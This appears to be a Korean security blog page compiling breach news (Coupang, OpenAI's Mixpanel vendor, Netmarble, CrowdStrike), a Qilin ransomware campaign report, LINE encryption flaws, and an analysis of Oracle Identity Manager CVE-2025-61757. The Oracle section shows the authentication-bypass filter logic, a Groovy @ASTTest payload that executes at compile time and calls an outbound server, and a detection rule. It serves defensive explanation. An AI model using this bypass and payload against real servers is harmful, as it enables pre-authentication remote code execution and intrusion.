요약 - 쿠팡, 사실상 이용자 대부분에 해당하는 3,370만개의 계정에서 개인정보 노출 사고 발생
- 올해 6월 말부터 약 5개월간 해외 서버를 통한 무단 접근하여 정보 탈취
내용 - 11.20 쿠팡, 고객 4,500여명의 개인정보 노출 사고 발생
> 고객 개인정보가 비인가 조회된 것으로 확인
> 과학기술정보통신부와 한국인터넷진흥원, 개인정보보호위원회에 신고
> 노출된 정보는 이름, 이메일 주소, 배송지 주소록(전화번호·주소), 최근 5건의 주문 정보
> 결제 정보나 신용카드 번호, 로그인 정보(비밀번호 등)는 별도 시스템에 격리돼 관리되므로 이번 유출 대상에 포함되지 않음
> 해당 활동을 탐지한 뒤 제3자가 사용했던 접근 경로 차단 및 모니터링 강화
> 지금까지 조회한 정보를 이용한 사례는 확인되지 않음
> 쿠팡을 사칭하는 전화와 문자 등에 각별한 주의 당부

- 11.29 쿠팡, 고객 개인 정보 노출 계정이 3,370만개 가량으로 확인되었다고 발표 (초기 발표의 7,500배)
> 활성 고객 수는 2,470만명으로, 사실상 모든 고객의 정보 노출
> 해외 서버를 통해 올해 06.24부터 무단으로 개인정보에 접근한 것으로 추정되며, 이 경로는 현재 차단됨
※ 무단 접근은 6월말부터 시작됐음에도 불구하고, 약 5개월이 지난 뒤인 11.18에야 처음으로 내부 침해 사실 인지 (장기간 유출 상황이 지속됐다는 것은 심각한 내부 감시‧보안 통제 실패를 의미)

- 정부, 이번 사안의 심각성을 고려해 민관합동조사단 구성·운영
> 11.30 민관합동조사단을 구성하고, 사고 원인 분석 및 재발방지 대책을 마련할 계획
> 개인정보위는 쿠팡으로부터 2차례에 걸쳐 유출 신고를 접수받아 11.21부터 조사 진행 중
> 국민 다수의 연락처, 주소 등이 포함되어 있어 신속한 조사를 거쳐 보호법상 안전조치의무 위반시 엄정 제재할 방침
> 과기정통부와 개인정보위는 2차 피해를 방지하기 위해 대국민 보안 공지 진행

- 이번 사고는 내부자 소행에 무게가 실리고 있으며, 인증이나 접근권한 관리쪽 문제였을 가능성 제기
> 서울경찰청 사이버수사대는 중국 국적 내부 직원 소행에 무게를 두고 수사에 착수
> 쿠팡은 지난 25일 수사대에 고소장 제출(고소장에 피고소인을 ‘성명불상자’로 기재)
> 지목된 내부자는 이미 쿠팡을 퇴사하고 중국에 거주 중인 것으로 알려짐

- 정부, 30일부터 3개월간을 ‘인터넷상(다크웹 포함) 개인정보 유노출 및 불법유통 모니터링 강화 기간’으로 지정

- 이번 일을 계기로 제로트러스트 등 철저한 접근관리 강화가 다시금 강조될 것으로 보임
> 사고를 당한 기업에 대한 질타보다는 탈취 정보 무력화 등 해결에 초점을 맞추는 대응으로 전환해야 할 것
> 이용자 보호 측면에서, 단순한 사칭 경고를 넘어 피해 보상, 신용 보호, 재발 방지를 위한 제도 설계가 필요하다는 지적
> 이용자 정보를 수집·관리하는 기업에 대한 규제 체계, 감독 기구의 권한 및 역할 재정비가 시급하다는 여론
기타 - 이번 유출 규모는 지난 4월 발생한 SK텔레콤 유출 사태(약 2,700만명 유심 정보 유출)보다도 훨씬 큰 규모
> 사실상 국내 민간기업 기반 최대 개인정보 유출 사고로 기록될 것
> 정부는 플랫폼 기업의 개인정보 보호 체계 전반에 대한 실태 조사와 강화된 규제‧감독 방안을 검토할 것

- 권한 관리, 퇴사자 계정·키 회수, 접근 통제 등 기본 통제 체계가 제대로 작동하지 않으면 수백억 투자가 무의미
> 쿠팡의 보안 체계가 투자 규모와 인력 숫자보다 근본적인 원칙과 운영 체계가 무너졌음을 보여주는 대표 사례

- 기본적으로 지켜야 할 보안 원칙
퇴사자 계정·키 즉각 회수
민감한 시스템 접근 권한 최소화
관리자 계정 다중 인증
접근 로그 모니터링
API 키 주기적 교체
데이터베이스 접근권한 이원화
※ 기본 요소가 제대로 운영되지 않으면 아무리 거대한 보안 예산을 투입해도 취약점은 그대로 남음

 

보안뉴스

 

쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼”

쿠팡에서 고객 4500여명의 개인정보가 노출되는 사고가 발생했다. 이에 쿠팡은 과학기술정보통신부와 한국인터넷진흥원, 개인정보보호위원회에 신고했다.

www.boannews.com

 

쿠팡, 개인정보 노출 계정 3370만개로 활성고객 수 넘어... “쿠팡 사칭 연락 주의”

쿠팡이 고객 개인 정보 노출 계정이 3370만개 가량으로 확인됐다고 29일 밝혔다. 활성 고객 수를 넘는 수치로, 사실상 모든 고객인 것으로 보인다.

www.boannews.com

 

쿠팡 고객 3370만개 계정 정보 유출 사태, 민관합동조사단 꾸린다

국내 최대 이커머스 기업 쿠팡에서 노출된 고객 개인정보 계정이 3370만개에 달하는 것으로 드러난 가운데 정부는 이번 사안의 심각성을 고려해 민관합동조사단을 구성·운영한다.

www.boannews.com

 

[쿠팡 해킹] 내부자 소행에 무게... “인증·접근권한 관리 문제 가능성”

3370만명의 쿠팡 고객 개인정보가 유출된 사고는 내부자 소행에 무게가 실리고 있다. 이에 따라 인증이나 접근권한 관리쪽 문제였을 가능성이 제기된다.

www.boannews.com

 

[쿠팡 해킹] ‘피해보상’·‘환불’ 등 쿠팡 사칭 스미싱·보이스피싱 주의보

국내 이커머스 1위 쿠팡에서 대규모 개인정보 유출 사고가 발생함에따라, 이를 악용한 스미싱·보이스피싱 등 2차 피해가 우려돼 주의를 요한다.

www.boannews.com

 

[쿠팡 해킹] 정부 “3개월간 개인정보 불법 유통 집중 모니터링”

쿠팡 사고를 계기로 정부는 30일부터 3개월간을 ‘인터넷상(다크웹 포함) 개인정보 유노출 및 불법유통 모니터링 강화 기간’으로 지정해 집중 모니터링에 들어간다.

www.boannews.com

 

1년 보안예산 890억·보안인력 214명 쿠팡, 퇴사자 보안관리 구멍이 3,370만건 개인정보 유출로 이어

쿠팡에서 3천만명 넘는 대규모 개인정보가 유출된 가운데, 개인정보보호위원회와 과기정통부가 전면 조사에 착수했다. 쿠팡은 연간 900억 원 가까이 보안에 투자하고

www.dailysecu.com

 

KISA 보호나라&KrCERT/CC

KISA 보호나라&KrCERT/CC

www.boho.or.kr:443

'보안뉴스' 카테고리의 다른 글

또 터진 ‘공급망 보안’... 오픈AI, 협력사 해킹에 고객정보 노출 불똥 외 1건  (0) 2025.11.28
메시징 앱 ‘라인’, 아시아 사용자들 사이버 첩보 노출 치명적 취약점 발견돼 외 1건  (0) 2025.11.26
쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼” 외 3건  (0) 2025.11.26
[긴급 속보] 아키라 랜섬웨어 조직, LG에너지솔루션 내부자료 1.7TB 유출 주장…아직 샘플 DB 공개전 외 2건  (0) 2025.11.23
[이슈] 중국 보안기업 ‘Knownsec’ 해킹당해…정부 지원 사이버 무기와 해외 표적 명단 대량 유출 외 1건  (0) 2025.11.12
요약 - 오픈AI의 데이터 분석 파트너 기업 믹스패널에서 보안사고가 발생하여 일부 API 사용자 계정 정보 유출
- 오픈AI는 이번 사건을 계기로 믹스패널 사용 영구 중단 및 보안 체계 재점검
내용 - 오픈AI의 데이터 분석 파트너 기업 믹스패널(Mixpanel) 보안 사고 발생
> 일부 이용자 정보가 유출됐으나, 대화 내용이나 비밀번호 같은 민감 정보는 포함되지 않음
> 믹스패널 내부 시스템에서 발생한 것으로 오픈AI 자체 시스템이나 인프라가 해킹되지는 않음
> 믹스패널은 9일 자사 시스템 침해 확인 및 조사를 거쳐 25일 피해 규모가 담긴 데이터셋을 오픈AI에 공유

- 오픈AI는 자체 조사를 거쳐 API 사용자 일부의 식별 정보가 포함된 분석 데이터가 공격자에 의해 ‘수출(export)’된 사실 확인
> 유출된 정보는 오픈AI API 플랫폼(platform.openai[.]com) 이용자의 정보
① 이름
② 이메일 주소
③ 대략적 위치정보(국가, 도시 등)
④ 접속 기기 운영체제 및 브라우저 정보
⑤ 서비스 접근 경로(Referer URL)
⑥ 조직 ID 또는 사용자 ID 등
※ API 사용자 계정과 연계된 ‘이름·이메일·메타데이터’를 확보했지만, AI 서비스 이용과 관련된 핵심 정보들은 외부로 노출되지 않음

- 오픈AI
> 27일(한국시각), 공식 블로그에서 “API 플랫폼의 웹 분석을 위해 사용하던 외부 협력사 믹스패널에서 보안 침해 사고가 발생했다”며 “이로 인해 일부 API 사용자 계정 정보가 유출된 정황을 확인했다”고 공지
> 챗GPT의 사용자 대화 로그(Chat logs)나 API 요청 내용, 비밀번호, API 인증키, 결제 정보, 신분증 등 민감 데이터는 이번 유출에 포함되지 않았다고 밝힘
> 사고 인지 직후 보안 조사의 일환으로 모든 서비스에서 믹스패널 연동을 즉시 중단하고 계약 해지 및 보안 체계 재점검 공지
> 영향받은 API 사용자들에게 순차적으로 개별 통지 이메일을 발송
> 회사나 관련 담당자를 사칭한 메일이 발송될 수 있어 의심스러운 메일이나 링크 클릭에 각별한 주의 요청

- API 플랫폼을 이용하는 개발자나 기업 계정의 메타데이터 일부가 노출된 상황
> 일반 이용자에 대한 영향은 미미할 것으로 보임

- 대규모 AI 사업자가 벤더 시스템 침해로 인해 사용자 데이터를 유출한 첫 사례
> AI 기반 서비스를 운영하는 국내 기업 역시 믹스패널, 구글 애널리틱스 등 다양한 외부 분석 플랫폼을 활용
> 국내 기업 또한 이번 사례를 계기로 외부 SaaS 벤더의 보안 체계, 데이터 수집 범위, API 관련 계정 보호 전략을 재점검 해야함

- AI 서비스가 확산될수록 외부 SaaS 벤더 체인은 복잡해지고, 벤더 중 하나만 무너지더라도 전체 생태계가 위험해지는 구조가 강화
> 공급업체 위험 평가(Vendor Risk Assessment)를 통해 보안성 검토지속적 모니터링 필요
> 서비스 공급자는 신뢰 센터(Trust Center) 같은 시스템을 통해 보안 인증 현황과 체크리스트를 공개하는 등 고객 신뢰를 담보할 투명성을 제공해야 함
> 벤더 계약 시 보안 평가·데이터 최소 수집·주기적 감사 같은 ‘벤더 보안 거버넌스’가 필수 요소가 될 것
기타 - 이름·이메일·접속 정보·조직 ID만으로도 공격자는 특정 기업의 개발자·엔지니어를 표적 삼아 API 키·액세스 토큰을 노리는 피싱, 조직명 기반의 스피어피싱, SaaS 계정 탈취 시도 등 다양한 공격 벡터를 만들 수 있음

- 글로벌 AI 플랫폼이 외부 분석 서비스에 의존한 데이터 흐름만으로도 사용자 정보가 노출될 수 있음을 보여준 사건
> AI 생태계 전반에서 ‘공급망 보안’이 핵심 과제로 떠오름

 

보안뉴스

 

또 터진 ‘공급망 보안’... 오픈AI, 협력사 해킹에 고객정보 노출 불똥

챗GPT 개발사 ‘오픈AI’(OpenAI)는 데이터 분석 파트너사인 ‘믹스패널’(Mixpanel)의 보안사고로 인해 일부 이용자의 정보가 유출됐다고 밝혔다. 다만, 대화 내용이나 비밀번호 같은 민감정보는 포

www.boannews.com

 

[이슈] 오픈AI, 분석 서비스 믹스패널 해킹으로 일부 API 사용자 정보 유출 인정…“자사 시스템

오픈AI(OpenAI)가 외부 분석 서비스 업체인 믹스패널(Mixpanel)의 보안 침해로 인해 일부 API 사용자 정보가 유출된 사실을 26일(현지시간) 공식

www.dailysecu.com

 

'보안뉴스' 카테고리의 다른 글

쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼” 외 8건  (0) 2025.11.30
메시징 앱 ‘라인’, 아시아 사용자들 사이버 첩보 노출 치명적 취약점 발견돼 외 1건  (0) 2025.11.26
쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼” 외 3건  (0) 2025.11.26
[긴급 속보] 아키라 랜섬웨어 조직, LG에너지솔루션 내부자료 1.7TB 유출 주장…아직 샘플 DB 공개전 외 2건  (0) 2025.11.23
[이슈] 중국 보안기업 ‘Knownsec’ 해킹당해…정부 지원 사이버 무기와 해외 표적 명단 대량 유출 외 1건  (0) 2025.11.12

1. 개요

- Bitdefender, 한국 금융 서비스 업계를 주요 타깃으로 한 대규모 위협 “Korean Leaks 캠페인” 발표 [1]
- RaaS(Ransomware-as-a-Service) 그룹 Qilin과 북한 연계 APT 그룹 Moonstone Sleet이 협업
MSP(Managed Service Provider, 관리 서비스 제공업체)를 초기 침입 경로로 활용해 33개의 기업이 피해(피해 업체 중 대부분이 금융서비스 업체)
- 이번 사건을 계기로 MSP를 ‘신뢰된 내부자’로 간주하는 관행을 재검토해야 한다고 강조

2. 주요내용

2.1 한국 내 비정상적인 랜섬웨어 급증

- 24.09 ~ 25.08 랜섬웨어 피해자 수는 월 평균 약 2건 수준이었으나, 25.09 피해자 건수는 25건으로 급증

> 초기 분석 결과, 25.09에 확인된 피해는 모두 Qilin 랜섬웨어에 의한 것으로 확인

※ 1건의 건설 회사를 제외한 24건 모두 금융서비스(특히 자산운용사)

[사진 1] 24.09 ~ 25.09 랜섬웨어 피해자 추이

2.2 Qilin & Moonstone Sleet

Qilin 랜섬웨어 그룹은 최근 몇 달 동안 RaaS 통계에서 최상위권을 유지해온 조직
> 다크웹 전용 유출 사이트(DLS, Dedicated Leak Site)에 데이터 공개 및 데이터 몸값을 요구
> 주요 운영팀은 브랜드, 랜섬웨어 빌드, 인프라, 협상용 텍스트를 제공하고, 실제 침투·내부 장악·배포는 다른 조직이 수행하는 “긱 이코노미형 RaaS” 형태로 운영
> 수익의 80~85%는 실제 공격조직이 가져가고, 운영팀은 15~20%만 가져가는 구조

※ CIS(독립국가연합) 국가를 공격하지 않는 규칙, 러시아어 포럼 활동, 운영진 일부가 러시아어와 영어를 사용하는 등 러시아에 기반한 랜섬웨어 그룹으로 보임

 

- Qilin은 2025년 초 북한 연계 APT 그룹 Moonstone Sleet과 협업을 시작
> Moonstone Sleet는 MS가 2024년 규명한 북한 위협 그룹 [3]
> 국가 연계 APT 그룹과 범죄 RaaS의 협업이라는 새로운 위협 양상을 시사

 

2.3 Korean Leaks 캠페인

- Korean Leaks 캠페인은 총 세 차례에 걸쳐 진행되었으며, 유출된 정보의 대부분은 25.09 공개
> 총 33곳의 피해자 중 28곳은 현재 공개 상태이며, 거의 대부분 한국 금융사, 특히 자산운용사를 공격 대상으로 삼음
> DLS에 유출된 데이터는 최소 100만 개 이상의 파일과 약 2TB에 달하며, 피해자의 메타데이터가 누락된 점을 고려하면 피해 규모는 훨씬 클 가능성 존재

[사진 2] 25.08~25.09 경 Qilin 랜섬웨어 조직이 공격에 성공한 기업 리스트

2.3.1 1차 유출

- 25.09.14 10개 금융관리·자산운용사 공개
> 한국 기업들의 방대한 데이터에 접근을 확보했다는 식으로 대규모 추가 유출 예고

[사진 3] 1차 유출

2.3.2 2차 유출

- 25.09.17 ~ 25.09.19 추가 피해자 9곳 공개
> 한국 금융시장과 투자자 전반을 겁주는 전략규제 당국에 조사 요구

[사진 4] 2차 유출

2.3.3 3차 유출

- 25.09.28 ~ 25.10.04 마지막 9곳 공개
> 2차 유출의 공격적인 요구에서 개별 피해 기업을 향한 전통적인 금전 갈취 문구로 전환

[사진 5] 3차 유출

2.3.4 기타

- 25.10.22 DLS에 금융·자산운용사 프로필을 가진 새로운 피해자 1TB 이상의 데이터 공개
> ‘Korean Leaks’라는 이름은 더 이상 사용되지 않았고 게시물도 하루 만에 삭제

 

2.4 Root Cause

- 캠페인은 기업들이 개별적으로 노려진 것이 아닌 하나의 공통 약점을 통해 피해가 발생

가설 설명
가설 1
상위 MSP 또는
IT 서비스·SW 벤더 침해		 단일 IT서비스 제공자·금융 소프트웨어 벤더·회계법인 등의 서버/관리 시스템 침해
> 해당 업체가 관리하는 다수의 고객으로 확장 가능한 접근 권한을 부여하는 등 악용할 수 있음
> 자산운용사 및 기타 금융기관의 서버와 컴퓨터 시스템을 관리하는 국내 IT 서비스 제공업체를 해킹해 국내 20여 개 자산운용사가 랜섬웨어 피해를 당하는 사례 존재 [4]
※ 가장 유력한 가설
가설 2
공통으로 사용하는
금융 SW/장비 제로데이 취약점 악용		 특정 금융 소프트웨어/하드웨어의 0-day 또는 공통 취약점 악용
> 동일 제품을 쓰는 다수 기관을 한 번에 침투
가설 3
유출된 자격증명 또는
내부자 거래 시나리오		 내부자 매수 또는 다량의 유효한 자격증명을 암시장에서 구매/입수하여 침투
> 유효한 로그인으로 보안통제를 우회할 수 있어 성공률이 높음

 

2.5 결론 및 권고 사항

- 해당 캠페인을 촉발한 MSP 침해는 사이버 보안 논의에서 거의 다뤄지지 않음
> 주로 SW공급망과 트로이화된 업데이트에 초점을 맞추는 경향이 있으나 이는 아직 통계적으로 드문 형태
> 여러 기업 접근 권한을 가진 벤더·계약업체·MSP를 직접 해킹하는 방식이 훨씬 흔하고 실용적인 전략

> 하나의 통제 수단이 실패하여도 후속 통제 수단이 피해를 감지·차단·제한할 수 있도록 다층적인 방어 체계 구축이 필요

구분 설명
MFA(Multi-Factor Authentication, 다중인증) 적용 모든 계정, 특히 원격 접속·VPN·특권계정에 대해 강제 적용
> 자격 증명이 유출돼도 즉각적인 네트워크 액세스를 방지할 수 있음
최소 권한의 원칙(Principle of Least Privilege, PoLP) 모든 시스템에 엄격한 역할 기반 접근 제어(Role-Based Access Control, RBAC) 구현
> 벤더사·파트너 계정이 업무에 필요한 최소한의 세션·권한 부여
네트워크 분할 네트워크 내 중요한 시스템과 민감 데이터 격리
> 벤더 네트워크나 비필수 서비스와 같은 네트워크에서 내부 핵심 시스템으로 접근하지 못하도록 네트워크 분할 및 격리
EDR/XDR/MDR 도입 공격자가의 체류 시간을 최소화할 수 있도록 엔드포인트 가시성 확보
> EDR/XDR을 통해 엔드포인트의 가시성 확보 및 상관 관계 분석 또는 MDR 아웃소싱
랜섬웨어 플레이북 깨기 공격자가 잘 확립되고 반복적인 공격 플레이북에 의존하기에, 예측 가능한 공격 경로를 끊어야 함
> PHASR(Proactive Hardening and Attack Surface Reduction, 공격 표면 감소·동적 하드닝) 같은 기술 도입
현재 보안 통제 운영 대부분의 조직에서 기술의 부족이 아닌 기존 컨트롤의 잘못된 구성과 활용도가 낮다는 것이 문제
> 랜섬웨어 완화 등 중요한 방어 기능의 활성화 여부 및 보유한 보안 기능을 활성화 상태로 만드는 것이 중요
공급망 리스크 관리 강화 MSP·벤더에 대한 요구사항·계약·감사·접속 통제 강화 및 제3자 접근 권한 정기적 검토

3. 참고

[1] https://www.bitdefender.com/en-us/blog/businessinsights/korean-leaks-campaign-targets-south-korean-financial-services-qilin-ransomware
[2] https://www.dailysecu.com/news/articleView.html?idxno=202815
[3] https://thehackernews.com/2024/05/microsoft-uncovers-moonstone-sleet-new.html
[4] https://koreajoongangdaily.joins.com/news/2025-09-23/business/finance/More-than-20-management-companies-may-have-suffered-data-breaches-after-a-ransomware-attack/2406352

'랜섬웨어 > 분석' 카테고리의 다른 글

LockBit 랜섬웨어 동향  (0) 2023.06.16
다크파워 (Dark Power) 랜섬웨어  (1) 2023.03.28
ESXiArgs Ransomware  (0) 2023.02.15
Masscan 랜섬웨어  (0) 2022.10.12
LockBit 3.0 랜섬웨어 빌더 분석  (1) 2022.10.04
요약 - 메시징 플팻폼 LINE의 암호화 프토콜 Letter Sealing v2에서 치명적 취약점 발견
- 메시지 재생 공격, 평문 데이터 유출, 사칭 공격 등 세 가지 위험 확인
내용 - 덴마크 연구진, LINE의 맞춤형 종단 간 암호화(End-to-End Encryption, E2EE) 프로토콜인 Letter Sealing v2에서 치명적인 취약점 발견
메시지 재생 공격, 평문 데이터 유출, 사칭 공격 등 세 가지 주요 침해 위험에 사용자들이 노출
> iOS용 라인 앱을 대상으로 중간자 공격 실험에 성공해 모든 취약점이 실제 환경에서 악용 가능함을 입증
> 사용자가 악성 라인 서버에 연결될 때 가능하며, 사용자는 자신이 합법적인 서버를 사용하고 있는지, 서버가 프로토콜을 제대로 준수하는지 확인할 방법이 없음
> 맞춤형 프로토콜을 사용한 것이 근본적인 문제이며, 이는 암호학 분야의 표준을 따르지 않아 오래된 문제점을 반복하고 있다고 지적

① 프로토콜의 Stateless 설계로 인해 악성 서버가 암호화된 기존 메시지를 미래의 어느 시점이든 반복적으로 재전송할 수 있음
> 메시지의 맥락과 의미를 완전히 바꾸어 혼란을 야기할 수 있음
> 암호문을 보낸다는 점에서 사용자는 절대 이를 눈치챌 수 없음

② 스티커 추천 기능 및 URL 미리보기 기능에서 사용자 입력 내용이 평문 형태로 서버에 전송
> 사용자의 기기에 없는 스티커를 추천하기 위해, 사용자가 입력한 실제 텍스트 일부가 라인 서버로 보내짐
> 사용자가 링크를 전송하면 상대방에게 미리보기 카드가 표시되는데, 이 과정에서 전체 URL이 서버로 전송
> URL에는 회의실 링크, 비밀번호, 토큰, 비공개 파일 주소 등 각종 민감한 정보가 포함될 수 있는데, 모두 서버가 그대로 확인할 수 있는 구조

③ 그룹 채팅 참여자가 서로를 가장해 메시지를 위조할 수 있음
> 가장 치명적인 문제
> 채팅에 참여한 사용자라면 누구나 다른 참가자를 사칭해 메시지를 위조할 수 있어, 수신자는 메시지가 조작된 내용임을 알 수 없음
> 라인이 제공하는 메시지 무결성과 발신자 인증 기능이 근본적으로 취약하다는 의미

- 연구진은 라인에 취약점을 사전 공개
> 라인은 취약점을 인정하며, 프로토콜 특성상 쉽게 수정할 수 없다는 입장
> 일부 기능을 비활성화하면 위험을 줄일 수 있으나, 근본적 해결책이나 프로토콜 교체 계획은 제시하지 않음

- 단순 메시지 노출 문제가 아니라, 실제 업무·정치·사회 전반에 치명적인 영향을 줄 수 있다고 경고
> 편의성과 기능 확장을 위해 도입된 요소들이 오히려 보안성을 약화 시킴
> 프로토콜 설계 자체도 현대적 E2EE 기준에 미치지 못하고 있다는 점이 확인

- 12월 개최되는 Black Hat Europe에서 발표될 예정
기타 -

 

보안뉴스

 

메시징 앱 ‘라인’, 아시아 사용자들 사이버 첩보 노출 치명적 취약점 발견돼

일본, 대만, 태국, 인도네시아 등 동아시아의 수백만 명이 사용하는 메시징 플랫폼 라인(LINE)의 맞춤형 종단 간 암호화(E2EE) 프로토콜인 레터 실링 v2에서 치명적인 취약점들이 발견됐다.

www.boannews.com

 

한국 비롯 아시아 2억 명 쓰는 메신저 ‘라인(LINE)’ 암호화에 심각한 취약점…“메시지 위조·재

한국, 일본 및 동아시아에서 일상 필수 앱으로 자리 잡은 메신저 ’라인(LINE)‘의 엔드투엔드 암호화(E2EE) 기능에 심각한 보안 취약점이 존재하는 것으로 드

www.dailysecu.com

 

'보안뉴스' 카테고리의 다른 글

쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼” 외 8건  (0) 2025.11.30
또 터진 ‘공급망 보안’... 오픈AI, 협력사 해킹에 고객정보 노출 불똥 외 1건  (0) 2025.11.28
쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼” 외 3건  (0) 2025.11.26
[긴급 속보] 아키라 랜섬웨어 조직, LG에너지솔루션 내부자료 1.7TB 유출 주장…아직 샘플 DB 공개전 외 2건  (0) 2025.11.23
[이슈] 중국 보안기업 ‘Knownsec’ 해킹당해…정부 지원 사이버 무기와 해외 표적 명단 대량 유출 외 1건  (0) 2025.11.12

1. Oracle Identity Manager (OIM)

- 사내 또는 클라우드 애플리케이션에 셀프 서비스, 규정 준수, 프로비저닝 및 비밀번호 관리 서비스를 제공하는 거버넌스 솔루션
- 고객, 비즈니스 파트너, 직원의 ID와 액세스 권한을 단일 플랫폼에서 모두 관리할 수 있음 [1]

2. 취약점

[사진 1] CVE-2025-61757 [2]

- REST API의 인증 우회 취약점으로 인해 원격 코드 실행이 가능한 취약점 (CVSS: 9.8)

> 해당 시스템이 공격자에게 장악될 경우 관리자 권한 생성, 사용자 권한 탈취, 인증 절차 조작, 내부 시스템 접근 토큰 획득, AD·ERP 연계 시스템 침투 등 조직 중심부까지 침해 확산

> 오라클이 취약점을 패치하기 훨씬 전부터 취약점을 대상으로한 공격 시도가 존재하여 신속한 패치 적용 권고

영향받는 버전
- Oracle Identity Manager 12.2.1.4.0, 14.1.2.1.0

 

2.1 인증 우회

- 애플리케이션은 web.xml에 등록된 단일 SecurityFilter로 모든 REST 경로의 인증을 제어하도록 구성되어 있음 [3]

> URL에 WSLD 매개변수가 포함되어 있거나 .wadl 문자열이 포함된 경우 인증을 우회할 수 있음

  private static final Pattern WADL_PATTERN = Pattern.compile("\.[wW][aA][dD][lL](.)*\z");

    public void doFilter(ServletRequest request, ServletResponse response, final FilterChain chain) throws IOException, ServletException {
        LOGGER.entering(CLASSNAME, "doFilter", new Object[]{request, response, chain});
        final HttpServletRequest httpRequest = (HttpServletRequest)request;
        HttpServletResponse httpResponse = (HttpServletResponse)response;
        WsmHttpResponseWrapper httpResponseWrapped = new WsmHttpResponseWrapper((HttpServletResponse)response);
        if (httpRequest.getQueryString() != null
            && httpRequest.getQueryString().trim().equalsIgnoreCase("WSDL")
            || WADL_PATTERN.matcher(httpRequest.getRequestURI().trim()).find()) {
            chain.doFilter((ServletRequest)httpRequest, (ServletResponse)httpResponse);
        } else {
            // ... check auth ...
        }
    }

 

2.2 원격 코드 실행

- 엔드포인트 목록 중 groovyscriptstatus 엔드포인트는 Groovy 코드의 구문 검사를 수행함

> Groovy 스크립트를 컴파일하지만 실행하지 않는 엔드포인트

    @POST
    @Consumes(value={"application/json"})
    @Path(value="/applications/groovyscriptstatus")
    public Response compileScript(String script) throws Exception {
        ApplicationRestLogger.LOGGER.entering(ApplicationrestServiceController.class.getName(), "compileScript(String)", new Object[]{script});
        try {
            ApplicationrestServiceImpl.compileScript(script);
        }
        catch (Exception e) {
            ApplicationRestLogger.LOGGER.log(Level.SEVERE, null, e);
            return Response.status((int)500).entity((Object)e.getMessage()).type("text/plain").build();
        }
        ApplicationRestLogger.LOGGER.exiting(ApplicationrestServiceController.class.getName(), "compileScript(String)");
        return Response.status((Response.Status)Response.Status.OK).entity((Object)"Script Compilation Successful").type("text/plain").build();
    }

 

- Groovy는 Java를 기반으로 구축되었기 때문에, 자바의 애너테이션을 적용할 수 있음

> 따라서, @ASTTest 애너테이션을 사용하여 컴파일 단계에서 특정 Groovy 코드를 실행할 수 있음

※ Groovy AST Transformation은 컴파일 시점 실행 허용

import groovy.transform.ASTTest
import org.codehaus.groovy.control.CompilePhase

class Demo {
    @ASTTest(phase = CompilePhase.SEMANTIC_ANALYSIS, value = {
        try {
            def connection = new URL("https://our.outbound.server").openConnection()
            connection.setRequestMethod("GET")
            def response = connection.getInputStream().getText()
        } catch (Exception e) {}
    })
    static void main(String[] args) {}
}

Demo.main()

3. 대응방안

- 벤더사 제공 업데이트 적용 [4]

- POST 요청에서 *.wadl, @ASTTest 등의 문자열 탐지 정책 적용

4. 참고

[1] https://docs.oracle.com/cd/E52734_01/oim/OMADM/overview.htm#OMADM5632
[2] https://nvd.nist.gov/vuln/detail/CVE-2025-61757
[3] https://slcyber.io/research-center/breaking-oracles-identity-manager-pre-auth-rce/
[4] https://www.oracle.com/security-alerts/cpuoct2025.html#AppendixFMW
[5] https://www.bleepingcomputer.com/news/security/cisa-warns-oracle-identity-manager-rce-flaw-is-being-actively-exploited/
[6] https://thehackernews.com/2025/11/cisa-warns-of-actively-exploited.html
[7] https://www.dailysecu.com/news/articleView.html?idxno=202697
[8] https://www.jeonguknews.co.kr/news/articleView.html?idxno=79996

'취약점 > By-Pass' 카테고리의 다른 글

PAN-OS Nginx/Apache Path Confusion을 통한 인증 우회 취약점 (CVE-2025-0108)  (0) 2025.11.23
Fortinet FortiWeb 경로 탐색 취약점 (CVE-2025-64446)  (0) 2025.11.17
vBulletin 인증 우회 및 원격 코드 실행 취약점 (CVE-2025-48827, CVE-2025-48828)  (0) 2025.06.10
Ivanti Endpoint Manager Mobile 인증 우회 및 원격 코드 실행 취약점 (CVE-2025-4427, CVE-2025-4428)  (1) 2025.05.25
CrushFTP 인증 우회 취약점 (CVE-2025-31161)  (0) 2025.04.26
요약 - 쿠팡, 넷마블 고객 개인정보 노출 사고 발생
- CrowdStrike, 해킹 그룹과 접촉해 내부 정보를 유출한 내부자 해고
내용 -  쿠팡, 고객 4500여명 개인정보 노출 사고 발생
> 18일 고객 개인정보가 비인가 조회된 것으로 확인
> 조회된 정보는 이름, 이메일 주소, 배송지 주소록(전화번호·주소), 최근 5건의 주문 정보
> 고객 결제와 관련한 정보에 대한 접근은 없었으며 보호되고 있음
> 과학기술정보통신부와 한국인터넷진흥원, 개인정보보호위원회에 신고
> 해당 활동을 탐지한 뒤 제3자가 사용했던 접근 경로 차단
> 지금까지 조회한 정보를 이용한 사례는 확인되지 않음

=====================================================================================

- 넷마블, 22일 해킹으로 인해 자사 PC 게임 사이트(www.netmarble\[.]net) 이용 고객과 일부 임직원 정보가 유출된 정황 확인
> 이름, 생년월일, 암호화된 비밀번호 정보 유출이 의심된다고 25일 밝힘
> 2015년 이전 가맹 PC방 사업주 정보와 일부 전현직 임직원 정보도 포함
> 주민등록번호와 같은 고유식별정보나 민감정보 유출은 없었으며, 비밀번호 등은 암호화된 상태로 해당 정보만으로는 악용 불가능할 것으로 판단
> 유출 가능성이 있는 게임은 바둑과 장기, 마구마구, 모두의마블(PC) 등 PC 온라인 게임 18종
> 유출 규모 등은 관계기관 조사가 나오면 즉시 투명하게 공개할 것
> 시스템 전반에 대한 확대 점검을 진행하는 등 필요한 보호 조치와 재발 방지 대책 수립 약속
> 게임 이용자들에게 비밀번호 변경 권고

=====================================================================================

- CrowdStrike, 최근 사내 정보를 외부 해킹조직에 넘긴 직원 한 명 해고
> 자사 내부 시스템 관련 정보를 외부로 유출한 ‘의심스러운 내부자’를 추적직원 한 명이 해킹그룹 ‘스캐터드 랩서스 헌터즈’(Scattered Lapsus$ Hunters)와 접촉한 사실 확인 및 해고
> 유출된 정보는 스크린샷 형태로 해킹 조직의 해커들의 텔레그램 공개 채널에 게시
